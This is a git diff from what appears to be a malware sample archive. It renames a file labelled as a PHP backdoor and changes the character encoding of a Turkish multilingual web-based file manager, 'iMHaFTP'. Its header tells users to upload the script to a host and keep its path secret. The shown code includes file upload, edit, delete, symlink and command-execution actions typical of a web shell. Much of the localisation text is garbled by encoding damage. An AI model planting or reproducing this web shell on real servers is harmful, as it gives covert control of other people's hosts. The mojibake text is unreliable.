diff --git a/PHP/Backdoor.PHP.Agent.z b/PHP/Backdoor.PHP.ImHabirligi.a similarity index 85% rename from PHP/Backdoor.PHP.Agent.z rename to PHP/Backdoor.PHP.ImHabirligi.a index 5d587c63005aea3ccca9d1ba8a2ab89409d8906d..c54fa3c728790f5a4a9fd49507a693e87a7128f3 100644 --- a/PHP/Backdoor.PHP.Agent.z +++ b/PHP/Backdoor.PHP.ImHabirligi.a @@ -3,11 +3,11 @@ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com> * - * Bu Kod Tamamiyle Özgür Yazilimdir. - * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir + * Bu Kod Tamamiyle Ć–zgür Yazilimdir. + * Kƶtü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir * Programin amaci ftp olmadan hostunuza baglanti kurup * Dosya ekleyip kaldira bilmektir. - * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar. + * Kodumuz 6 Dilde yazilmistir.Server Diline Gƶre Otomatik Secim Yapar. * ------------------------------------------------------------------------- * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!! @@ -19,16 +19,16 @@ * BeweiS * <BeweiS@imhabirligi.com> * iMHaBiRLiGi Administrator - * Php-Asp-Programlama ve Güvenlik + * Php-Asp-Programlama ve Güvenlik * * MicroP_ * <MicroP_@imhabirligi.com> * iMHaBiRLiGi Administrator - * Php-Asp-Programlama ve Güvenlik + * Php-Asp-Programlama ve Güvenlik * * Libertical * <libertical@imhabirligi.com> - * iMHaBiRLiGi Yönetim + * iMHaBiRLiGi Yƶnetim * C++, Delphi,Programlama ve Linux Hastasi * * PowerGhost @@ -38,7 +38,7 @@ * * BadSector * ozgurkaleli@yahoo.com - * iMHaBiRLiGi Yönetim + * iMHaBiRLiGi Yƶnetim * VicualBasic-Delphi Programlama * Sistemdanismani ve Linux Hastasi * @@ -70,10 +70,10 @@ $charset = 'ISO-8859-1'; */ $homedir = './'; -/* Size of the Düzenle textarea +/* Size of the Düzenle textarea */ -$Düzenlecols = 80; -$Düzenlerows = 25; +$Düzenlecols = 80; +$Düzenlerows = 25; /* ------------------------------------------- * Optional configuration (reTasi # to enable) @@ -305,7 +305,7 @@ case 'create_file': } else { $old = @umask(0777 & ~$filepermission); if (@touch($file)) { - Düzenle($file); + Düzenle($file); } else { listing_page(error('not_created', $file)); } @@ -653,7 +653,7 @@ case 'create_symlink': break; -case 'Düzenle': +case 'Düzenle': if (!empty($_POST['save'])) { @@ -668,9 +668,9 @@ case 'D } else { if (@is_readable($file) && @is_writable($file)) { - Düzenle($file); + Düzenle($file); } else { - listing_page(error('not_Düzenleed', $file)); + listing_page(error('not_Düzenleed', $file)); } } @@ -1161,7 +1161,7 @@ function listing ($list) { } - echo ' <th class="Görevler">' . word('Görevler') . '</th> + echo ' <th class="Gƶrevler">' . word('Gƶrevler') . '</th> </tr> '; @@ -1252,7 +1252,7 @@ function listing ($list) { } - echo ' <td class="Görevler"> + echo ' <td class="Gƶrevler"> <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" /> '; @@ -1268,7 +1268,7 @@ function listing ($list) { if ($file['is_file'] && $file['is_readable']) { $actions[] = 'Kopyala'; $actions[] = 'indir'; - if ($file['is_writable']) $actions[] = 'Düzenle'; + if ($file['is_writable']) $actions[] = 'Düzenle'; } if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { $actions[] = 'execute'; @@ -1372,8 +1372,8 @@ function create_box () { } -function Düzenle ($file) { - global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess; +function Düzenle ($file) { + global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess; html_header(); @@ -1385,7 +1385,7 @@ function D <tr> <td class="dialog"> - <textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">'; + <textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">'; if (array_key_exists('content', $_POST)) { echo $_POST['content']; @@ -1437,7 +1437,7 @@ function D } echo ' - <input type="hidden" name="action" value="Düzenle" /> + <input type="hidden" name="action" value="Düzenle" /> <input type="hidden" name="file" value="' . html($file) . '" /> <input type="hidden" name="dir" value="' . html($directory) . '" /> <input type="reset" value="' . word('reset') . '" id="red_button" /> @@ -1526,52 +1526,52 @@ function getwords ($lang) { 'file' => 'Datei', 'filename' => 'Dateiname', -'size' => 'Größe', +'size' => 'GrƶĆe', 'permission' => 'Rechte', 'owner' => 'Eigner', 'group' => 'Gruppe', 'other' => 'Andere', -'Görevler' => 'Funktionen', +'Gƶrevler' => 'Funktionen', 'read' => 'lesen', 'write' => 'schreiben', -'execute' => 'ausführen', +'execute' => 'ausführen', 'create_symlink' => 'Symlink erstellen', -'Sil' => 'löschen', +'Sil' => 'lƶschen', 'Degistir' => 'umbenennen', 'Tasi' => 'verschieben', 'Kopyala' => 'kopieren', -'Düzenle' => 'Düzenleieren', +'Düzenle' => 'Düzenleieren', 'indir' => 'herunterladen', 'upload' => 'hochladen', 'create' => 'erstellen', 'change' => 'wechseln', 'save' => 'speichern', 'set' => 'setze', -'reset' => 'zurücksetzen', +'reset' => 'zurücksetzen', 'relative' => 'Pfad zum Ziel relativ', 'yes' => 'Ja', 'no' => 'Nein', -'Geri' => 'zurück', +'Geri' => 'zurück', 'Yol' => 'Ziel', 'symlink' => 'Symbolischer Link', 'no_output' => 'keine Ausgabe', 'user' => 'Benutzername', 'password' => 'Kennwort', -'add' => 'hinzufügen', -'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen', +'add' => 'hinzufügen', +'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen', 'uploaded' => '"[%1]" wurde hochgeladen.', 'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', 'already_exists' => '"[%1]" existiert bereits.', 'created' => '"[%1]" wurde erstellt.', 'not_created' => '"[%1]" konnte nicht erstellt werden.', -'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?', -'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]", -'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]", +'really_Sil' => 'Sollen folgende Dateien wirklich gelƶscht werden?', +'Sild' => "Folgende Dateien wurden gelƶscht:\n[%1]", +'not_Sild' => "Folgende Dateien konnten nicht gelƶscht werden:\n[%1]", 'Degistir_file' => 'Benenne Datei um:', 'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.', 'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', @@ -1581,16 +1581,16 @@ function getwords ($lang) { 'Kopyala_files' => 'Kopiere folgende Dateien:', 'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", 'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", -'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.', -'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}", -'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}", +'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.', +'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}", +'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}", 'saved' => '"[%1]" wurde gespeichert.', 'not_saved' => '"[%1]" konnte nicht gespeichert werden.', 'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', 'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', -'permission_for' => 'Rechte für "[%1]":', -'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.', -'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.', +'permission_for' => 'Rechte für "[%1]":', +'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.', +'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.', 'not_readable' => '"[%1]" kann nicht gelesen werden.' ); @@ -1600,34 +1600,34 @@ function getwords ($lang) { $word_charset = 'ISO-8859-1'; return array( -'directory' => 'Répertoire', +'directory' => 'RĆ©pertoire', 'file' => 'Fichier', 'filename' => 'Nom fichier', 'size' => 'Taille', 'permission' => 'Droits', -'owner' => 'Propriétaire', +'owner' => 'PropriĆ©taire', 'group' => 'Groupe', 'other' => 'Autres', -'Görevler' => 'Fonctions', +'Gƶrevler' => 'Fonctions', 'read' => 'Lire', 'write' => 'Ecrire', -'execute' => 'Exécuter', +'execute' => 'ExĆ©cuter', -'create_symlink' => 'Créer lien symbolique', +'create_symlink' => 'CrĆ©er lien symbolique', 'Sil' => 'Effacer', 'Degistir' => 'Renommer', -'Tasi' => 'Déplacer', +'Tasi' => 'DĆ©placer', 'Kopyala' => 'Copier', -'Düzenle' => 'Ouvrir', -'indir' => 'Télécharger sur PC', -'upload' => 'Télécharger sur serveur', -'create' => 'Créer', +'Düzenle' => 'Ouvrir', +'indir' => 'TĆ©lĆ©charger sur PC', +'upload' => 'TĆ©lĆ©charger sur serveur', +'create' => 'CrĆ©er', 'change' => 'Changer', 'save' => 'Sauvegarder', -'set' => 'Exécuter', -'reset' => 'Réinitialiser', +'set' => 'ExĆ©cuter', +'reset' => 'RĆ©initialiser', 'relative' => 'Relatif', 'yes' => 'Oui', @@ -1642,34 +1642,34 @@ function getwords ($lang) { 'add' => 'Ajouter', 'add_basic_auth' => 'add basic-authentification', -'uploaded' => '"[%1]" a été téléchargé sur le serveur.', -'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.', -'already_exists' => '"[%1]" existe déją.', -'created' => '"[%1]" a été créé.', -'not_created' => '"[%1]" n a pas pu źtre créé.', +'uploaded' => '"[%1]" a Ć©tĆ© tĆ©lĆ©chargĆ© sur le serveur.', +'not_uploaded' => '"[%1]" n a pas Ć©tĆ© tĆ©lĆ©chargĆ© sur le serveur.', +'already_exists' => '"[%1]" existe dĆ©jĆ .', +'created' => '"[%1]" a Ć©tĆ© crƩƩ.', +'not_created' => '"[%1]" n a pas pu ĆŖtre crƩƩ.', 'really_Sil' => 'Effacer le fichier?', -'Sild' => "Ces fichiers ont été détuits:\n[%1]", -'not_Sild' => "Ces fichiers n ont pu źtre détruits:\n[%1]", +'Sild' => "Ces fichiers ont Ć©tĆ© dĆ©tuits:\n[%1]", +'not_Sild' => "Ces fichiers n ont pu ĆŖtre dĆ©truits:\n[%1]", 'Degistir_file' => 'Renomme fichier:', -'Degistird' => '"[%1]" a été renommé en "[%2]".', -'not_Degistird' => '"[%1] n a pas pu źtre renommé en "[%2]".', -'Tasi_files' => 'Déplacer ces fichiers:', -'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]", -'not_Tasid' => "Ces fichiers n ont pas pu źtre déplacés en \"[%2]\":\n[%1]", +'Degistird' => '"[%1]" a Ć©tĆ© renommĆ© en "[%2]".', +'not_Degistird' => '"[%1] n a pas pu ĆŖtre renommĆ© en "[%2]".', +'Tasi_files' => 'DĆ©placer ces fichiers:', +'Tasid' => "Ces fichiers ont Ć©tĆ© dĆ©placĆ©s en \"[%2]\":\n[%1]", +'not_Tasid' => "Ces fichiers n ont pas pu ĆŖtre dĆ©placĆ©s en \"[%2]\":\n[%1]", 'Kopyala_files' => 'Copier ces fichiers:', -'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]", -'not_copied' => "Ces fichiers n ont pas pu źtre copiés en \"[%2]\":\n[%1]", -'not_Düzenleed' => '"[%1]" ne peut źtre ouvert.', -'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}", -'not_executed' => "\"[%1]\" n a pas pu źtre exécuté:\n{%2}", -'saved' => '"[%1]" a été sauvegardé.', -'not_saved' => '"[%1]" n a pas pu źtre sauvegardé.', -'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.', -'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu źtre créé.', +'copied' => "Ces fichiers ont Ć©tĆ© copiĆ©s en \"[%2]\":\n[%1]", +'not_copied' => "Ces fichiers n ont pas pu ĆŖtre copiĆ©s en \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" ne peut ĆŖtre ouvert.', +'executed' => "\"[%1]\" a Ć©tĆ© brillamment exĆ©cutĆ© :\n{%2}", +'not_executed' => "\"[%1]\" n a pas pu ĆŖtre exĆ©cutĆ©:\n{%2}", +'saved' => '"[%1]" a Ć©tĆ© sauvegardĆ©.', +'not_saved' => '"[%1]" n a pas pu ĆŖtre sauvegardĆ©.', +'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a Ć©tĆ© crĆ©e.', +'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu ĆŖtre crƩƩ.', 'permission_for' => 'Droits de "[%1]":', -'permission_set' => 'Droits de "[%1]" ont été changés en [%2].', -'permission_not_set' => 'Droits de "[%1]" n ont pas pu źtre changés en[%2].', -'not_readable' => '"[%1]" ne peut pas źtre ouvert.' +'permission_set' => 'Droits de "[%1]" ont Ć©tĆ© changĆ©s en [%2].', +'permission_not_set' => 'Droits de "[%1]" n ont pas pu ĆŖtre changĆ©s en[%2].', +'not_readable' => '"[%1]" ne peut pas ĆŖtre ouvert.' ); case 'it': @@ -1687,7 +1687,7 @@ function getwords ($lang) { 'owner' => 'Proprietario', 'group' => 'Gruppo', 'other' => 'Altro', -'Görevler' => 'Funzioni', +'Gƶrevler' => 'Funzioni', 'read' => 'leggi', 'write' => 'scrivi', @@ -1698,7 +1698,7 @@ function getwords ($lang) { 'Degistir' => 'rinomina', 'Tasi' => 'sposta', 'Kopyala' => 'copia', -'Düzenle' => 'modifica', +'Düzenle' => 'modifica', 'indir' => 'indir', 'upload' => 'upload', 'create' => 'crea', @@ -1720,34 +1720,34 @@ function getwords ($lang) { 'add' => 'aggiungi', 'add_basic_auth' => 'aggiungi autenticazione base', -'uploaded' => '"[%1]" č stato caricato.', -'not_uploaded' => '"[%1]" non č stato caricato.', -'already_exists' => '"[%1]" esiste gią.', -'created' => '"[%1]" č stato creato.', -'not_created' => '"[%1]" non č stato creato.', +'uploaded' => '"[%1]" ĆØ stato caricato.', +'not_uploaded' => '"[%1]" non ĆØ stato caricato.', +'already_exists' => '"[%1]" esiste giĆ .', +'created' => '"[%1]" ĆØ stato creato.', +'not_created' => '"[%1]" non ĆØ stato creato.', 'really_Sil' => 'Cancello questi file ?', 'Sild' => "Questi file sono stati cancellati:\n[%1]", 'not_Sild' => "Questi file non possono essere cancellati:\n[%1]", 'Degistir_file' => 'File rinominato:', -'Degistird' => '"[%1]" č stato rinominato in "[%2]".', -'not_Degistird' => '"[%1] non č stato rinominato in "[%2]".', +'Degistird' => '"[%1]" ĆØ stato rinominato in "[%2]".', +'not_Degistird' => '"[%1] non ĆØ stato rinominato in "[%2]".', 'Tasi_files' => 'Sposto questi file:', 'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]", 'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", 'Kopyala_files' => 'Copio questi file', 'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]", 'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", -'not_Düzenleed' => '"[%1]" non puņ essere modificato.', -'executed' => "\"[%1]\" č stato eseguito con successo:\n{%2}", -'not_executed' => "\"[%1]\" non č stato eseguito con successo\n{%2}", -'saved' => '"[%1]" č stato salvato.', -'not_saved' => '"[%1]" non č stato salvato.', -'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" č stato creato.', -'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non č stato creato.', +'not_Düzenleed' => '"[%1]" non può essere modificato.', +'executed' => "\"[%1]\" ĆØ stato eseguito con successo:\n{%2}", +'not_executed' => "\"[%1]\" non ĆØ stato eseguito con successo\n{%2}", +'saved' => '"[%1]" ĆØ stato salvato.', +'not_saved' => '"[%1]" non ĆØ stato salvato.', +'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" ĆØ stato creato.', +'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non ĆØ stato creato.', 'permission_for' => 'Permessi di "[%1]":', 'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', 'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', -'not_readable' => '"[%1]" non puņ essere letto.' +'not_readable' => '"[%1]" non può essere letto.' ); case 'se': @@ -1761,29 +1761,29 @@ function getwords ($lang) { 'filename' => 'Filnamn', 'size' => 'Storlek', -'permission' => 'Säkerhetsnivå', -'owner' => 'Ägare', +'permission' => 'SƤkerhetsnivĆ�', +'owner' => 'Ć„gare', 'group' => 'Grupp', 'other' => 'Andra', -'Görevler' => 'Funktioner', +'Gƶrevler' => 'Funktioner', -'read' => 'Läs', +'read' => 'LƤs', 'write' => 'Skriv', -'execute' => 'Utför', +'execute' => 'Utfƶr', 'create_symlink' => 'Skapa symlink', 'Sil' => 'Radera', 'Degistir' => 'Byt namn', 'Tasi' => 'Flytta', 'Kopyala' => 'Kopiera', -'Düzenle' => 'Ändra', +'Düzenle' => 'Ć„ndra', 'indir' => 'Ladda ner', 'upload' => 'Ladda upp', 'create' => 'Skapa', -'change' => 'Ändra', +'change' => 'Ć„ndra', 'save' => 'Spara', 'set' => 'Markera', -'reset' => 'Töm', +'reset' => 'Tƶm', 'relative' => 'Relative path to target', 'yes' => 'Ja', @@ -1793,9 +1793,9 @@ function getwords ($lang) { 'symlink' => 'Symlink', 'no_output' => 'no output', -'user' => 'Användare', -'password' => 'Lösenord', -'add' => 'Lägg till', +'user' => 'AnvƤndare', +'password' => 'Lƶsenord', +'add' => 'LƤgg till', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" har laddats upp.', @@ -1804,28 +1804,28 @@ function getwords ($lang) { 'created' => '"[%1]" har skapats.', 'not_created' => '"[%1]" kunde inte skapas.', 'really_Sil' => 'Radera dessa filer?', -'Sild' => "De här filerna har raderats:\n[%1]", +'Sild' => "De hƤr filerna har raderats:\n[%1]", 'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]", -'Degistir_file' => 'Byt namn på fil:', +'Degistir_file' => 'Byt namn pĆ� fil:', 'Degistird' => '"[%1]" har bytt namn till "[%2]".', -'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".', +'not_Degistird' => '"[%1] kunde inte dƶpas om till "[%2]".', 'Tasi_files' => 'Flytta dessa filer:', 'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]", 'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", 'Kopyala_files' => 'Kopiera dessa filer:', 'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]", 'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", -'not_Düzenleed' => '"[%1]" kan inte ändras.', -'executed' => "\"[%1]\" har utförts:\n{%2}", -'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}", +'not_Düzenleed' => '"[%1]" kan inte Ƥndras.', +'executed' => "\"[%1]\" har utfƶrts:\n{%2}", +'not_executed' => "\"[%1]\" kunde inte utfƶras:\n{%2}", 'saved' => '"[%1]" har sparats.', 'not_saved' => '"[%1]" kunde inte sparas.', -'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.', -'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.', -'permission_for' => 'Rättigheter för "[%1]":', -'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].', +'symlinked' => 'Symlink frĆ�n "[%2]" till "[%1]" har skapats.', +'not_symlinked' => 'Symlink frĆ�n "[%2]" till "[%1]" kunde inte skapas.', +'permission_for' => 'RƤttigheter fƶr "[%1]":', +'permission_set' => 'RƤttigheter fƶr "[%1]" Ƥndrades till [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', -'not_readable' => '"[%1]" kan inte läsas.' +'not_readable' => '"[%1]" kan inte lƤsas.' ); case 'en': @@ -1835,7 +1835,7 @@ function getwords ($lang) { $word_charset = 'ISO-8859-1'; return array( -'directory' => 'Düzergah', +'directory' => 'Düzergah', 'file' => 'Dosya', 'filename' => 'DosyaAdi', @@ -1843,8 +1843,8 @@ function getwords ($lang) { 'permission' => 'izin', 'owner' => 'Sahip', 'group' => 'Grup', -'other' => 'Dišerleri', -'Görevler' => 'Görevler', +'other' => 'Diưerleri', +'Gƶrevler' => 'Gƶrevler', 'read' => 'Oku', 'write' => 'Yaz', @@ -1855,9 +1855,9 @@ function getwords ($lang) { 'Degistir' => 'Degistir', 'Tasi' => 'Tasi', 'Kopyala' => 'Kopyala', -'Düzenle' => 'Düzenle', +'Düzenle' => 'Düzenle', 'indir' => 'indir', -'upload' => 'Yükle', +'upload' => 'Yükle', 'create' => 'Olustur', 'change' => 'Degisiklik', 'save' => 'Kaydet', @@ -1870,21 +1870,21 @@ function getwords ($lang) { 'Geri' => 'Geri', 'Yol' => 'Yol', 'symlink' => 'Symlink', -'no_output' => 'Hiēbir ēżktż', +'no_output' => 'HiƧbir çýktý', -'user' => 'Kullanżcż', +'user' => 'Kullanýcý', 'password' => 'Sifre', 'add' => 'Ekle', 'add_basic_auth' => 'add basic-authentification', -'uploaded' => '"[%1]" Yüklendi.', -'not_uploaded' => '"[%1]" Yüklenemedi.', -'already_exists' => '"[%1]" Žimdiden var ol.', +'uploaded' => '"[%1]" Yüklendi.', +'not_uploaded' => '"[%1]" Yüklenemedi.', +'already_exists' => '"[%1]" Ʋimdiden var ol.', 'created' => '"[%1]" Olusturuldu.', 'not_created' => '"[%1]" Olusturuldu.', 'really_Sil' => 'Silinen dosyalar?', 'Sild' => "Bu dosyalar,oldu Sild:\n[%1]", -'not_Sild' => "Bu dosyalar olamazdż Sild:\n[%1]", +'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]", 'Degistir_file' => 'Dosyayi Degistir:', 'Degistird' => '"[%1]" Degistirildi "[%2]".', 'not_Degistird' => '"[%1] Degistirilemedi "[%2]".', @@ -1894,11 +1894,11 @@ function getwords ($lang) { 'Kopyala_files' => 'Bu Dosyalari Kopyala:', 'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]", 'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]", -'not_Düzenleed' => '"[%1]" Düzenle.', +'not_Düzenleed' => '"[%1]" Düzenle.', 'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}", 'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}", 'saved' => '"[%1]" Kurtarildi.', -'not_saved' => '"[%1]" Kurtarżlamadż.', +'not_saved' => '"[%1]" Kurtarýlamadý.', 'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.', 'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.', 'permission_for' => 'izin "[%1]":', @@ -1958,7 +1958,7 @@ hr { border-style: none; height: 1px; Geriground-color: silver; color: silver } .listing .permission { font-family: monospace } .listing .owner { text-align: left } .listing .group { text-align: left } -.listing .Görevler { text-align: left } +.listing .Gƶrevler { text-align: left } .listing_footer td { Geriground: #eee; border: 1px solid silver } #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt } #directory { Geriground: #eee; border: 1px solid silver }